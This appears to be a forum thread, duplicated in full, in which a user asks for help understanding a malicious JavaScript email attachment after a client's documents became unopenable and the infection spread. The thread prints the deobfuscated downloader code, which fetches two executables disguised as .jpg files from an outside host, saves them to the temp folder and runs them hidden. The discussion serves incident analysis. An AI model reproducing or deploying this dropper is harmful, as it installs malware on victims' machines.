需要帮助弄清楚这个 Js 做了什么
Need help figuring out what this Js does
如果有人知道这个 java 脚本文件中发生了什么,能告诉我吗?我们的一位客户收到了一封电子邮件,嗯……现在她无法打开任何文档或电子表格。看起来它也传播到了网络的其余部分。
如果有人能帮助我理解它,我将不胜感激。
我已经删除了,不想让别人知道。
我可能不需要告诉任何人,但是请不要打开它,除非它在沙盒中。电脑变砖我概不负责
来源:私信我要文件而不是..
基本上,它是将病毒下载到您的临时文件夹并执行...
您应该运行对整个网络进行病毒扫描。
var AxProxy = function() {};
(function () {
function fFh(fr, Klw, rn) {
var VeZ = new AxProxy('WScript.Shell');
var Klw = VeZ['ExpandEnvironmentStrings']('%TEMP%') + "\" + Klw;
var OG4 = new AxProxy('MSXML2.XMLHTTP');
OG4['onReadyStateChange'] = function() {
if (OG4['readyState'] === 4) {
var g38 = new AxProxy('ADODB.Stream');
g38['open']();
g38['type'] = 1;
g38['write'](OG4['ResponseBody']);
g38['position'] = 0;
g38['saveToFile'](Klw, 2);
g38['close']();
}
};
try {
OG4['open']('GET', fr, false);
OG4['send']();
if (rn > 0) {
VeZ['Run'](Klw, 0, 0);
}
} catch (er) {};
}
fFh("http://dorttlokolrt.com/images/one.jpg", '542824559.exe', 1);
fFh("http://dorttlokolrt.com/images/two.jpg", '589878543.exe', 1);
}();
所有其他变量都是乱码,旨在混淆和阻碍解码。
PS:我已经代理了 ActiveXObject 所以这不可能是 运行...
如果有人知道这个 java 脚本文件中发生了什么,能告诉我吗?我们的一位客户收到了一封电子邮件,嗯……现在她无法打开任何文档或电子表格。看起来它也传播到了网络的其余部分。
如果有人能帮助我理解它,我将不胜感激。
我已经删除了,不想让别人知道。
我可能不需要告诉任何人,但是请不要打开它,除非它在沙盒中。电脑变砖我概不负责
来源:私信我要文件而不是..
基本上,它是将病毒下载到您的临时文件夹并执行...
您应该运行对整个网络进行病毒扫描。
var AxProxy = function() {};
(function () {
function fFh(fr, Klw, rn) {
var VeZ = new AxProxy('WScript.Shell');
var Klw = VeZ['ExpandEnvironmentStrings']('%TEMP%') + "\" + Klw;
var OG4 = new AxProxy('MSXML2.XMLHTTP');
OG4['onReadyStateChange'] = function() {
if (OG4['readyState'] === 4) {
var g38 = new AxProxy('ADODB.Stream');
g38['open']();
g38['type'] = 1;
g38['write'](OG4['ResponseBody']);
g38['position'] = 0;
g38['saveToFile'](Klw, 2);
g38['close']();
}
};
try {
OG4['open']('GET', fr, false);
OG4['send']();
if (rn > 0) {
VeZ['Run'](Klw, 0, 0);
}
} catch (er) {};
}
fFh("http://dorttlokolrt.com/images/one.jpg", '542824559.exe', 1);
fFh("http://dorttlokolrt.com/images/two.jpg", '589878543.exe', 1);
}();
所有其他变量都是乱码,旨在混淆和阻碍解码。
PS:我已经代理了 ActiveXObject 所以这不可能是 运行...